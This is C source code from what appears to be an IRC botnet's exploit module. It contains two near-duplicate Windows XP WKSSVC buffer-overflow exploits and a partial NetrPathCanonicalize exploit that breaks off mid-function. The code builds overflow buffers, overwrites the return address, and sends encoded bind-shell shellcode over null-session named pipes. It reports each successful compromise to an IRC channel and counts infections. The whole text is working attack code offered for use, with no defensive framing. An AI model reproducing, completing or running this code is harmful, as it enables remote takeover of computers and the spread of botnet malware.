BOOL SendReqPacket_Part(HANDLE hPipe, RPC_ReqNorm pPacketHeader, unsigned char *pStubData, unsigned long nDataLen, unsigned long nMaxSize, bool bFirst)
{
bool bSendNext;
unsigned char *pPacket;
unsigned long nBytesWritten;
// first fragment
if( bFirst )
pPacketHeader.NormalHeader.flags |= 1; // first fragment
else
pPacketHeader.NormalHeader.flags &= ~1; // not first fragment
if( ( nDataLen + sizeof( RPC_ReqNorm ) ) <= nMaxSize )
{
// last
pPacketHeader.NormalHeader.fraglength = (unsigned short)( nDataLen + sizeof( RPC_ReqNorm ) );
pPacketHeader.allochint = nDataLen;
pPacketHeader.NormalHeader.flags |= 2; // last fragment
bSendNext = false;
}
else
{
// not last fragment
pPacketHeader.NormalHeader.fraglength = (unsigned short)nMaxSize;
pPacketHeader.allochint = nMaxSize - sizeof( RPC_ReqNorm );
pPacketHeader.NormalHeader.flags &= ~2; // not last fragment
bSendNext = true;
}
// alloc packet
pPacket = (unsigned char*)malloc( pPacketHeader.NormalHeader.fraglength );
if( !pPacket )
return false;
// make packet
*(RPC_ReqNorm*)pPacket = pPacketHeader; // copy header
memcpy( &pPacket[ sizeof( RPC_ReqNorm ) ], pStubData, pPacketHeader.allochint ); // add stub data
// send
if( !WriteFile( hPipe, pPacket, pPacketHeader.NormalHeader.fraglength, &nBytesWritten, NULL ) )
{
free( pPacket );
return false;
}
free( pPacket );
// send remaining
if( bSendNext )
return SendReqPacket_Part( hPipe, pPacketHeader, &pStubData[ pPacketHeader.allochint ], nDataLen - pPacketHeader.allochint, nMaxSize, false );
else
return true;
}
bool SendReqPacket_Part( HANDLE hPipe, RPC_ReqNorm pPacketHeader, unsigned char *pStubData, size_t nDataLen, UINT16 nMaxSize, bool bFirst )
{
bool bSendNext;
unsigned char *pPacket;
DWORD nBytesWritten;
if( bFirst )
pPacketHeader.NormalHeader.flags |= 1;
else
pPacketHeader.NormalHeader.flags &= ~1;
if( ( nDataLen + sizeof( RPC_ReqNorm ) ) <= nMaxSize )
{
pPacketHeader.NormalHeader.fraglength = (UINT16)( nDataLen + sizeof( RPC_ReqNorm ) );
pPacketHeader.allochint = (UINT32)nDataLen;
pPacketHeader.NormalHeader.flags |= 2;
bSendNext = false;
}
else
{
pPacketHeader.NormalHeader.fraglength = (UINT16)nMaxSize;
pPacketHeader.allochint = nMaxSize - sizeof( RPC_ReqNorm );
pPacketHeader.NormalHeader.flags &= ~2;
bSendNext = true;
}
pPacket = (unsigned char*)malloc( pPacketHeader.NormalHeader.fraglength );
if( !pPacket )
return false;
*(RPC_ReqNorm*)pPacket = pPacketHeader;
memcpy( &pPacket[ sizeof( RPC_ReqNorm ) ], pStubData, pPacketHeader.allochint );
if( !WriteFile( hPipe, pPacket, pPacketHeader.NormalHeader.fraglength, &nBytesWritten, NULL ) ||
nBytesWritten != pPacketHeader.NormalHeader.fraglength )
{
free( pPacket );
return false;
}
free( pPacket );
if( bSendNext )
return SendReqPacket_Part( hPipe, pPacketHeader, pStubData + pPacketHeader.allochint, nDataLen - pPacketHeader.allochint, nMaxSize, false );
else
return true;
}
//BOOL ScriptGod_WKSSVC(unsigned long nTargetID,EXINFO exinfo,char *target, void* conn)
BOOL sgwkssvc(unsigned long nTargetID,EXINFO exinfo,char *target, void* conn)
{
IRC* irc=(IRC*)conn;
//irc->privmsg(target,"%s %s: Connected to IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
BOOL success=FALSE;
int TargetOS;
// char szShellBuf[ 512 ];
int iShellSize;
// =============================
char* pszTarget;
// ---
char szNetbiosTarget[ 8192 ];
wchar_t wszNetbiosTarget[ 8192 ];
unsigned char szShellcodeEncoded[ ( 405 * 2 ) + 1 ];
unsigned char szExploitsData[ 3500 ];
unsigned long nExploitsDataPos;
wchar_t wszExploitsData[ sizeof( szExploitsData ) ];
// ---
char szIPC[ 8192 ];
NETRESOURCE NetSource;
// ---
char szPipe[ 8192 ];
HANDLE hPipe;
// ---
RPC_ReqBind BindPacket;
unsigned long nBytesWritten;
RPC_ReqNorm ReqNormalHeader;
unsigned long nPacketSize;
unsigned char* pPacket;
unsigned long nPacketPos;
// ============================
TargetOS = FpHost(exinfo.ip, FP_PORT5K);
if(TargetOS != OS_WINXP)
TargetOS = FpHost(exinfo.ip, FP_RPC);
if(TargetOS != OS_WINXP)
return FALSE;
else
success=TRUE;
// irc->privmsg(target,"%s %s: Target running XP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
// parameters
pszTarget=exinfo.ip;
// char URL[MAX_HOSTNAME];
// char fname[_MAX_FNAME];
// sprintf(fname,"eraseme_%d%d%d%d%d.exe",rand()%9,rand()%9,rand()%9,rand()%9,rand()%9);
// _snprintf(URL,sizeof(URL),
// "ftp://*****:*****@%s:%d/%s",
// (PrivateIP(exinfo.ip)?inip:exip),FTP_PORT,fname);
unsigned short port;
port = fhtons(bindport)^(USHORT)0x9999;
memcpy(&bindshell[176],&port,2);
iShellSize=wbindsize;//setup_shellcode_udtf(szShellBuf, sizeof(szShellBuf), URL, false, NULL);
if (!iShellSize)
return FALSE;
// get shellcode
//iShellSize = GetRNS0TerminatedShellcode( szShellBuf, sizeof( szShellBuf ), GetIP( exinfo.sock ), filename );
//if( !iShellSize )
// return FALSE;
// generate exploits buffer
// ========================
ZeroMemory(szShellcodeEncoded, sizeof(szShellcodeEncoded));
ZeroMemory(szExploitsData, sizeof(szExploitsData));
ZeroMemory(wszExploitsData, sizeof(wszExploitsData));
// fill with NOPs (using inc ecx instead of NOP, 0-terminated-string)
memset(szExploitsData,'A',sizeof(szExploitsData)-1);
// new EIP
*(unsigned long*)(&szExploitsData[Targets[nTargetID].nNewEIP_BufferOffset]) = Targets[nTargetID].nNewEIP;
// some NOPs
nExploitsDataPos = 2300;
// add stack
memcpy( &szExploitsData[ nExploitsDataPos ], szStack, sizeof( szStack ) - 1 );
nExploitsDataPos += sizeof( szStack ) - 1;
// add decoder
memcpy( &szExploitsData[ nExploitsDataPos ], szDecoder, sizeof( szDecoder ) - 1 );
nExploitsDataPos += sizeof( szDecoder ) - 1;
// add shellcode
// - bind port
// - encode
Encode( (unsigned char*)bindshell, iShellSize, szShellcodeEncoded );
// - add
memcpy( &szExploitsData[ nExploitsDataPos ], szShellcodeEncoded, strlen( (char*)szShellcodeEncoded ) );
nExploitsDataPos += strlen( (char*)szShellcodeEncoded );
// - 0 terminaten for decoder
szExploitsData[ nExploitsDataPos ] = 0;
nExploitsDataPos += 1;
// convert to UNICODE
// ==================
for( int n = 0; n < sizeof( szExploitsData ); n++ )
wszExploitsData[ n ] = szExploitsData[ n ];
//MultiByteToWideChar( CP_ACP, 0, (char*)szExploitsData, -1, wszExploitsData, sizeof( wszExploitsData ) / sizeof( wchar_t ) );
_snprintf(szNetbiosTarget,sizeof(szNetbiosTarget), "\\\\%s", pszTarget);
mbstowcs(wszNetbiosTarget,szNetbiosTarget, sizeof(wszNetbiosTarget)/sizeof(wchar_t));
// create NULL session
// ===================
if( strcmpi( pszTarget, "." ) )
{
//_snprintf(szIPC,sizeof(szIPC), "\\\\%s\\", pszTarget);
_snprintf(szIPC,sizeof(szIPC),"\\\\%s\\",pszTarget);
strncat(szIPC,"ipc$",sizeof(szIPC));
ZeroMemory(&NetSource,sizeof(NetSource));
NetSource.lpRemoteName = szIPC;
fWNetAddConnection2(&NetSource,"","",0);
}
// ===================
// connect to pipe
// ===============
//_snprintf(szPipe,sizeof(szPipe),"\\\\%s\\pipe\\wkssvc",pszTarget);
_snprintf(szPipe,sizeof(szPipe),"\\\\%s\\",pszTarget);
strncat(szPipe,"pipe\\wkssvc",sizeof(szPipe));
hPipe = CreateFile(szPipe, GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
if(hPipe == INVALID_HANDLE_VALUE)
{
fWNetCancelConnection2(NetSource.lpRemoteName, 0, FALSE);
return FALSE;
}
// ===============
// bind packet
// ===========
ZeroMemory(&BindPacket,sizeof(BindPacket));
BindPacket.NormalHeader.versionmaj = 5;
BindPacket.NormalHeader.versionmin = 0;
BindPacket.NormalHeader.type = 11; // bind
BindPacket.NormalHeader.flags = 3; // first + last fragment
BindPacket.NormalHeader.representation = 0x00000010; // little endian
BindPacket.NormalHeader.fraglength = sizeof(BindPacket);
BindPacket.NormalHeader.authlength = 0;
BindPacket.NormalHeader.callid = 1;
BindPacket.maxtsize = 4280;
BindPacket.maxrsize = 4280;
BindPacket.assocgid = 0;
BindPacket.numelements = 1;
BindPacket.contextid = 0;
BindPacket.numsyntaxes = 1;
BindPacket.Interface1.version = 1;
memcpy(BindPacket.Interface1.byte, "\x98\xd0\xff\x6b\x12\xa1\x10\x36\x98\x33\x46\xc3\xf8\x7e\x34\x5a", 16);
BindPacket.Interface2.version = 2;
memcpy(BindPacket.Interface2.byte, "\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60", 16);
// send
if(!WriteFile(hPipe, &BindPacket, sizeof( RPC_ReqBind ), &nBytesWritten, NULL))
{
//irc->privmsg(target,"%s %s: !WriteFile: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
CloseHandle(hPipe);
fWNetCancelConnection2(NetSource.lpRemoteName, 0, FALSE);
return FALSE;
}
// ===========
// request
// =======
// generate packet
// ---------------
// calc packet size
nPacketSize = 0;
nPacketSize += sizeof( szWKSSVCUnknown1 ) - 1;
nPacketSize += sizeof( UNISTR2 );
nPacketSize += ( wcslen( wszNetbiosTarget ) + 1 ) * sizeof( wchar_t );
while(nPacketSize % 4)
nPacketSize++;
if(Targets[nTargetID].bCanUse_NetAddAlternateComputerName)
nPacketSize += sizeof( szWKSSVCUnknown2 ) - 1;
nPacketSize += sizeof( UNISTR2 );
nPacketSize += ( wcslen( wszExploitsData ) + 1 ) * sizeof( wchar_t );
while( nPacketSize % 4 )
nPacketSize++;
nPacketSize += 8; // szWSSKVCUnknown3
if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
nPacketSize += 4; // NetAddAlternateComputerName = reserved
else
nPacketSize += 2; // NetValidateName = NameType
// alloc packet
pPacket = (unsigned char*)malloc( nPacketSize );
if( !pPacket )
{
//irc->privmsg(target,"%s %s: !malloc: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
CloseHandle( hPipe );
fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
return FALSE;
}
ZeroMemory(pPacket,nPacketSize);
// build packet
nPacketPos = 0;
// - szWKSSVCUnknown1
memcpy( &pPacket[ nPacketPos ], szWKSSVCUnknown1, sizeof( szWKSSVCUnknown1 ) - 1 );
nPacketPos += sizeof( szWKSSVCUnknown1 ) - 1;
// - wszNetbiosTarget
( (UNISTR2*)&pPacket[ nPacketPos ] )->length = wcslen( wszNetbiosTarget ) + 1;
( (UNISTR2*)&pPacket[ nPacketPos ] )->unknown = 0;
( (UNISTR2*)&pPacket[ nPacketPos ] )->maxlength = ( (UNISTR2*)&pPacket[ nPacketPos ] )->length;
nPacketPos += sizeof( UNISTR2 );
wcscpy( (wchar_t*)&pPacket[ nPacketPos ], wszNetbiosTarget );
nPacketPos += ( wcslen( wszNetbiosTarget ) + 1 ) * sizeof( wchar_t );
// - align
while( nPacketPos % 4 )
nPacketPos++;
// - szWKSSVCUnknown2
if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
{
memcpy( &pPacket[ nPacketPos ], szWKSSVCUnknown2, sizeof( szWKSSVCUnknown2 ) - 1 );
nPacketPos += sizeof( szWKSSVCUnknown2 ) - 1;
}
// - wszExploitsData
( (UNISTR2*)&pPacket[ nPacketPos ] )->length = wcslen( wszExploitsData ) + 1;
( (UNISTR2*)&pPacket[ nPacketPos ] )->unknown = 0;
( (UNISTR2*)&pPacket[ nPacketPos ] )->maxlength = ( (UNISTR2*)&pPacket[ nPacketPos ] )->length;
nPacketPos += sizeof( UNISTR2 );
wcscpy( (wchar_t*)&pPacket[ nPacketPos ], wszExploitsData );
nPacketPos += ( wcslen( wszExploitsData ) + 1 ) * sizeof( wchar_t );
// - align
while( nPacketPos % 4 )
nPacketPos++;
// - szWSSKVCUnknown3 (only eigth 0x00s)
ZeroMemory(&pPacket[nPacketPos],8);
nPacketPos += 8;
if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
{
// NetAddAlternateComputerName = 0
*(DWORD*)&pPacket[ nPacketPos ] = 0;
nPacketPos += sizeof( DWORD );
}
else
{
// NetValidateName = NetSetupMachine
*(unsigned short*)&pPacket[ nPacketPos ] = 1;
nPacketPos += 2;
}
// header
ZeroMemory(&ReqNormalHeader,sizeof(ReqNormalHeader));
ReqNormalHeader.NormalHeader.versionmaj = 5;
ReqNormalHeader.NormalHeader.versionmin = 0;
ReqNormalHeader.NormalHeader.type = 0; // request
ReqNormalHeader.NormalHeader.flags = 3; // first + last fragment
ReqNormalHeader.NormalHeader.representation = 0x00000010; // little endian
ReqNormalHeader.NormalHeader.authlength = 0;
ReqNormalHeader.NormalHeader.callid = 1;
ReqNormalHeader.prescontext = 0;
if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
ReqNormalHeader.opnum = 27; // NetrAddAlternateComputerName
else
ReqNormalHeader.opnum = 25; // NetrValidateName2
// send
if( !SendReqPacket_Part( hPipe, ReqNormalHeader, pPacket, nPacketSize, 4280, true ) )
{
//irc->privmsg(target,"%s %s: !SendReqPacket_Part: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
CloseHandle( hPipe );
free( pPacket );
fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
return FALSE;
}
// =======
// clean up
// =================;
CloseHandle( hPipe );
free( pPacket );
fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
if (success)
{
Sleep(5000);
if (ConnectShell(exinfo,bindport))
{
if (!exinfo.silent)
irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
exploit[exinfo.exploit].stats++;
}
else
if (!exinfo.silent && exinfo.verbose)
irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
}
return TRUE;
}
BOOL ScriptGod_WKSSVC( unsigned long nTargetID, EXINFO exinfo )
{
int TargetOS;
char szShellBuf[ 512 ];
int iShellSize;
// =============================
char* pszTarget;
// ---
char szNetbiosTarget[ 8192 ];
wchar_t wszNetbiosTarget[ 8192 ];
unsigned char szShellcodeEncoded[ ( sizeof( szShellBuf ) * 2 ) + 1 ];
unsigned char szExploitsData[ 3500 ];
unsigned long nExploitsDataPos;
wchar_t wszExploitsData[ sizeof( szExploitsData ) ];
// ---
char szIPC[ 8192 ];
NETRESOURCE NetSource;
// ---
char szPipe[ 8192 ];
HANDLE hPipe;
// ---
RPC_ReqBind BindPacket;
unsigned long nBytesWritten;
RPC_ReqNorm ReqNormalHeader;
unsigned long nPacketSize;
unsigned char* pPacket;
unsigned long nPacketPos;
// ============================
// check if xp
TargetOS = FpHost( exinfo.ip, FP_RPC );
if( TargetOS != OS_WINXP )
return FALSE;
// parameters
pszTarget = exinfo.ip;
// get shellcode
iShellSize = GetRNS0TerminatedShellcode( szShellBuf, sizeof( szShellBuf ), GetIP( exinfo.sock ), filename );
if( !iShellSize )
return FALSE;
// generate exploits buffer
// ========================
memset( szShellcodeEncoded, 0, sizeof( szShellcodeEncoded ) );
memset( szExploitsData, 0, sizeof( szExploitsData ) );
memset( wszExploitsData, 0, sizeof( wszExploitsData ) );
// fill with NOPs (using inc ecx instead of NOP, 0-terminated-string)
memset( szExploitsData, 'A', sizeof( szExploitsData ) - 1 );
// new EIP
*(unsigned long*)( &szExploitsData[ Targets[ nTargetID ].nNewEIP_BufferOffset ] ) = Targets[ nTargetID ].nNewEIP;
// some NOPs
nExploitsDataPos = 2300;
// add stack
memcpy( &szExploitsData[ nExploitsDataPos ], szStack, sizeof( szStack ) - 1 );
nExploitsDataPos += sizeof( szStack ) - 1;
// add decoder
memcpy( &szExploitsData[ nExploitsDataPos ], szDecoder, sizeof( szDecoder ) - 1 );
nExploitsDataPos += sizeof( szDecoder ) - 1;
// add shellcode
// - bind port
// - encode
Encode( (unsigned char*)szShellBuf, iShellSize, szShellcodeEncoded );
// - add
memcpy( &szExploitsData[ nExploitsDataPos ], szShellcodeEncoded, strlen( (char*)szShellcodeEncoded ) );
nExploitsDataPos += strlen( (char*)szShellcodeEncoded );
// - 0 terminaten for decoder
szExploitsData[ nExploitsDataPos ] = 0;
nExploitsDataPos += 1;
// convert to UNICODE
// ==================
for( int n = 0; n < sizeof( szExploitsData ); n++ )
wszExploitsData[ n ] = szExploitsData[ n ];
//MultiByteToWideChar( CP_ACP, 0, (char*)szExploitsData, -1, wszExploitsData, sizeof( wszExploitsData ) / sizeof( wchar_t ) );
snprintf( szNetbiosTarget, sizeof( szNetbiosTarget ), "\\\\%s", pszTarget );
mbstowcs( wszNetbiosTarget, szNetbiosTarget, sizeof( wszNetbiosTarget ) / sizeof( wchar_t ) );
// create NULL session
// ===================
if( strcmpi( pszTarget, "." ) )
{
snprintf( szIPC, sizeof( szIPC ), "\\\\%s\\ipc$", pszTarget );
memset( &NetSource, 0 ,sizeof( NetSource ) );
NetSource.lpRemoteName = szIPC;
fWNetAddConnection2( &NetSource, "", "", 0 );
}
// ===================
// connect to pipe
// ===============
snprintf( szPipe, sizeof( szPipe ), "\\\\%s\\pipe\\wkssvc", pszTarget );
hPipe = CreateFile( szPipe, GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL );
if( hPipe == INVALID_HANDLE_VALUE )
{
fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
return FALSE;
}
// ===============
// bind packet
// ===========
memset( &BindPacket, 0, sizeof( BindPacket ) );
BindPacket.NormalHeader.versionmaj = 5;
BindPacket.NormalHeader.versionmin = 0;
BindPacket.NormalHeader.type = 11; // bind
BindPacket.NormalHeader.flags = 3; // first + last fragment
BindPacket.NormalHeader.representation = 0x00000010; // little endian
BindPacket.NormalHeader.fraglength = sizeof( BindPacket );
BindPacket.NormalHeader.authlength = 0;
BindPacket.NormalHeader.callid = 1;
BindPacket.maxtsize = 4280;
BindPacket.maxrsize = 4280;
BindPacket.assocgid = 0;
BindPacket.numelements = 1;
BindPacket.contextid = 0;
BindPacket.numsyntaxes = 1;
BindPacket.Interface1.version = 1;
memcpy( BindPacket.Interface1.byte, "\x98\xd0\xff\x6b\x12\xa1\x10\x36\x98\x33\x46\xc3\xf8\x7e\x34\x5a", 16 );
BindPacket.Interface2.version = 2;
memcpy( BindPacket.Interface2.byte, "\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60", 16 );
// send
if( !WriteFile( hPipe, &BindPacket, sizeof( RPC_ReqBind ), &nBytesWritten, NULL ) )
{
CloseHandle( hPipe );
fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
return FALSE;
}
// ===========
// request
// =======
// generate packet
// ---------------
// calc packet size
nPacketSize = 0;
nPacketSize += sizeof( szWKSSVCUnknown1 ) - 1;
nPacketSize += sizeof( UNISTR2 );
nPacketSize += ( wcslen( wszNetbiosTarget ) + 1 ) * sizeof( wchar_t );
while( nPacketSize % 4 )
nPacketSize++;
if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
nPacketSize += sizeof( szWKSSVCUnknown2 ) - 1;
nPacketSize += sizeof( UNISTR2 );
nPacketSize += ( wcslen( wszExploitsData ) + 1 ) * sizeof( wchar_t );
while( nPacketSize % 4 )
nPacketSize++;
nPacketSize += 8; // szWSSKVCUnknown3
if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
nPacketSize += 4; // NetAddAlternateComputerName = reserved
else
nPacketSize += 2; // NetValidateName = NameType
// alloc packet
pPacket = (unsigned char*)malloc( nPacketSize );
if( !pPacket )
{
CloseHandle( hPipe );
fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
return FALSE;
}
memset( pPacket, 0, nPacketSize );
// build packet
nPacketPos = 0;
// - szWKSSVCUnknown1
memcpy( &pPacket[ nPacketPos ], szWKSSVCUnknown1, sizeof( szWKSSVCUnknown1 ) - 1 );
nPacketPos += sizeof( szWKSSVCUnknown1 ) - 1;
// - wszNetbiosTarget
( (UNISTR2*)&pPacket[ nPacketPos ] )->length = wcslen( wszNetbiosTarget ) + 1;
( (UNISTR2*)&pPacket[ nPacketPos ] )->unknown = 0;
( (UNISTR2*)&pPacket[ nPacketPos ] )->maxlength = ( (UNISTR2*)&pPacket[ nPacketPos ] )->length;
nPacketPos += sizeof( UNISTR2 );
wcscpy( (wchar_t*)&pPacket[ nPacketPos ], wszNetbiosTarget );
nPacketPos += ( wcslen( wszNetbiosTarget ) + 1 ) * sizeof( wchar_t );
// - align
while( nPacketPos % 4 )
nPacketPos++;
// - szWKSSVCUnknown2
if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
{
memcpy( &pPacket[ nPacketPos ], szWKSSVCUnknown2, sizeof( szWKSSVCUnknown2 ) - 1 );
nPacketPos += sizeof( szWKSSVCUnknown2 ) - 1;
}
// - wszExploitsData
( (UNISTR2*)&pPacket[ nPacketPos ] )->length = wcslen( wszExploitsData ) + 1;
( (UNISTR2*)&pPacket[ nPacketPos ] )->unknown = 0;
( (UNISTR2*)&pPacket[ nPacketPos ] )->maxlength = ( (UNISTR2*)&pPacket[ nPacketPos ] )->length;
nPacketPos += sizeof( UNISTR2 );
wcscpy( (wchar_t*)&pPacket[ nPacketPos ], wszExploitsData );
nPacketPos += ( wcslen( wszExploitsData ) + 1 ) * sizeof( wchar_t );
// - align
while( nPacketPos % 4 )
nPacketPos++;
// - szWSSKVCUnknown3 (only eigth 0x00s)
memset( &pPacket[ nPacketPos ], 0, 8 );
nPacketPos += 8;
if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
{
// NetAddAlternateComputerName = 0
*(DWORD*)&pPacket[ nPacketPos ] = 0;
nPacketPos += sizeof( DWORD );
}
else
{
// NetValidateName = NetSetupMachine
*(unsigned short*)&pPacket[ nPacketPos ] = 1;
nPacketPos += 2;
}
// header
memset( &ReqNormalHeader, 0, sizeof( ReqNormalHeader ) );
ReqNormalHeader.NormalHeader.versionmaj = 5;
ReqNormalHeader.NormalHeader.versionmin = 0;
ReqNormalHeader.NormalHeader.type = 0; // request
ReqNormalHeader.NormalHeader.flags = 3; // first + last fragment
ReqNormalHeader.NormalHeader.representation = 0x00000010; // little endian
ReqNormalHeader.NormalHeader.authlength = 0;
ReqNormalHeader.NormalHeader.callid = 1;
ReqNormalHeader.prescontext = 0;
if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
ReqNormalHeader.opnum = 27; // NetrAddAlternateComputerName
else
ReqNormalHeader.opnum = 25; // NetrValidateName2
// send
if( !SendReqPacket_Part( hPipe, ReqNormalHeader, pPacket, nPacketSize, 4280, true ) )
{
CloseHandle( hPipe );
free( pPacket );
fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
return FALSE;
}
// =======
// clean up
// =================;
CloseHandle( hPipe );
free( pPacket );
fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
char buffer[ IRCLINE ];
//_snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
addlog(buffer);
exploit[exinfo.exploit].stats++;
return TRUE;
}
BOOL exnetapi (EXINFO exinfo, int nTarget)
{
char szIPC[ 8192 ];
NETRESOURCE NetSource;
DWORD nNullSessionError;
char szPipe[ 8192 ];
HANDLE hPipe;
RPC_ReqBind BindPacket;
DWORD nBytesWritten;
DWORD nBytesRead;
unsigned char RecvBuff[ 8192 ];
NetrPathCanonicalize_Start PStart;
NetrPathCanonicalize_End PEnd;
size_t nPathLen;
size_t nBufferPos;
unsigned char *pPath;
size_t nPacketSize;
unsigned char *pPacket;
RPC_ReqNorm ReqNormalHeader;
bool bExit;
int nCount;
OVERLAPPED ov;
if( _stricmp( exinfo.ip, "." ) )
{
_snprintf( szIPC, sizeof( szIPC ), "\\\\%s\\ipc$", exinfo.ip );
memset( &NetSource, 0 ,sizeof( NetSource ) );
NetSource.lpRemoteName = szIPC;
nNullSessionError = fWNetAddConnection2( &NetSource, "", "", 0 );
}
_snprintf( szPipe, sizeof( szPipe ), "\\\\%s\\pipe\\browser", exinfo.ip );
hPipe = CreateFile( szPipe,
GENERIC_WRITE | GENERIC_READ,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
FILE_FLAG_OVERLAPPED,
NULL );
if( hPipe == INVALID_HANDLE_VALUE )
return false;
memset( &BindPacket, 0, sizeof( BindPacket ) );
BindPacket.NormalHeader.versionmaj = 5;
BindPacket.NormalHeader.versionmin = 0;
BindPacket.NormalHeader.type = 11;
BindPacket.NormalHeader.flags = 3;
BindPacket.NormalHeader.representation = 0x00000010;
BindPacket.NormalHeader.fraglength = sizeof( BindPacket );
BindPacket.NormalHeader.authlength = 0;
BindPacket.NormalHeader.callid = 0;
BindPacket.maxtsize = MAX_FRAG_SIZE;
BindPacket.maxrsize = MAX_FRAG_SIZE;
BindPacket.assocgid = 0;
BindPacket.numelements = 1;
BindPacket.contextid = 0;
BindPacket.numsyntaxes = 1;
memcpy( BindPacket.Interface1.byte, "\xC8\x4F\x32\x4B\x70\x16\xD3\x01\x12\x78\x5A\x47\xBF\x6E\xE1\x88", 16 );
BindPacket.Interface1.version = 3;
memcpy( BindPacket.Interface2.byte, "\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60", 16 );
BindPacket.Interface2.version = 2;
if( !WriteFile( hPipe, &BindPacket, sizeof( RPC_ReqBind ), &nBytesWritten, NULL ) )
{
CloseHandle( hPipe );
return false;
}
ReadFile( hPipe, RecvBuff, sizeof( RecvBuff ), &nBytesRead, NULL );
srand( (int)time( NULL ) );
memset( &PStart, 0x41, sizeof( PStart ) );
memset( &PEnd, 0x41, sizeof( PEnd ) );
PStart.ReferendID = rand();
PStart.Server.length = 1;
PStart.Server.offset = 0;
PStart.Server.maxlength = 1;
PStart.Server_Data = L'';
if( Targets[ nTarget ].bIsWinXP )
{
PEnd.Prefix.length = 1;
PEnd.Prefix.offset = 0;
PEnd.Prefix.maxlength = 1;
memcpy( PEnd.Prefix_Data, "\x00\x00\x00\x00", 4 );
}
else
{
PEnd.Prefix.length = 2;
PEnd.Prefix.offset = 0;
PEnd.Prefix.maxlength = 2;
memcpy( PEnd.Prefix_Data, "\xeb\x02\x00\x00", 4 );
}
PEnd.OutBufLen = rand() % 250 + 1;
PEnd.Type = rand() % 250 + 1;;
PEnd.Flags = 0;
nPathLen = Targets[ nTarget ].nPathLen;
pPath = (unsigned char*)malloc( nPathLen );
if( !pPath )
{
CloseHandle( hPipe );
return false;
}
memset( pPath, 0x90, nPathLen - 2 );
memset( pPath + nPathLen - 2, 0, 2 );
nBufferPos = Targets[ nTarget ].nShellCodeAddr;
memcpy( pPath + nBufferPos, stack, sizeof( stack ) - 1 );
nBufferPos += sizeof( stack ) - 1;
memcpy( pPath + nBufferPos, scode, sizeof( scode ) - 1 );
nBufferPos += sizeof( scode ) - 1;
nBufferPos = Targets[ nTarget ].nOffsetStartAddr;
if( Targets[ nTarget ].bIsWinXP )
{
memcpy( pPath + nBufferPos, &nOffset2, sizeof( nOffset1 ) );
nBufferPos += 4;
nBufferPos += 8;
memcpy( pPath + nBufferPos, &nOffset1, sizeof( nOffset1 ) );
nBufferPos += 4;
nBufferPos += 32;
memcpy( pPath + nBufferPos, &nOffset1, sizeof( nOffset1 ) );
nBufferPos += 4;
nBufferPos += 8;
memcpy( pPath + nBufferPos, &nOffset1, sizeof( nOffset1 ) );
nBufferPos += 4;
nBufferPos += 32;
nBufferPos += sizeof( wchar_t );
}
else
{
for( size_t n = 0; n < 16; n++ )
memcpy( pPath + nBufferPos + ( n * sizeof( nOffset1 ) ), &nOffset1, sizeof( nOffset1 ) );
}
nPacketSize =
sizeof( PStart )
+ sizeof( UNISTR2 )
+ nPathLen + sizeof( wchar_t ) + 4
+ sizeof( NetrPathCanonicalize_End );
pPacket = (unsigned char*)malloc( nPacketSize );
if( !pPacket )
{
CloseHandle( hPipe );
free( pPath );
return false;
}
memset( pPacket, 0, nPacketSize );
nBufferPos = 0;
memcpy( pPacket, &PStart, sizeof( PStart ) );
nBufferPos += sizeof( NetrPathCanonicalize_Start );
( (UNISTR2*)( pPacket + nBufferPos ) )->length = (UINT32)ceil( (float)nPathLen / sizeof( wchar_t ) );
( (UNISTR2*)( pPacket + nBufferPos ) )->offset = 0;
( (UNISTR2*)( pPacket + nBufferPos ) )->maxlength = ( (UNISTR2*)( pPacket + nBufferPos ) )->length;
nBufferPos += sizeof( UNISTR2 );
memcpy( pPacket + nBufferPos, pPath, nPathLen );
nBufferPos += nPathLen;
while( nBufferPos % 4 )
nBufferPos++;
memcpy( pPacket + nBufferPos, &PEnd, sizeof( PEnd ) );
nBufferPos += sizeof( PEnd );
free( pPath );
memset( &ReqNormalHeader, 0, sizeof( ReqNormalHeader ) );
ReqNormalHeader.NormalHeader.versionmaj = 5;
ReqNormalHeader.NormalHeader.versionmin = 0;
ReqNormalHeader.NormalHeader.type = 0;
ReqNormalHeader.NormalHeader.flags = 3;
ReqNormalHeader.NormalHeader.representation = 0x00000010;
ReqNormalHeader.NormalHeader.authlength = 0;
ReqNormalHeader.NormalHeader.callid = 0;
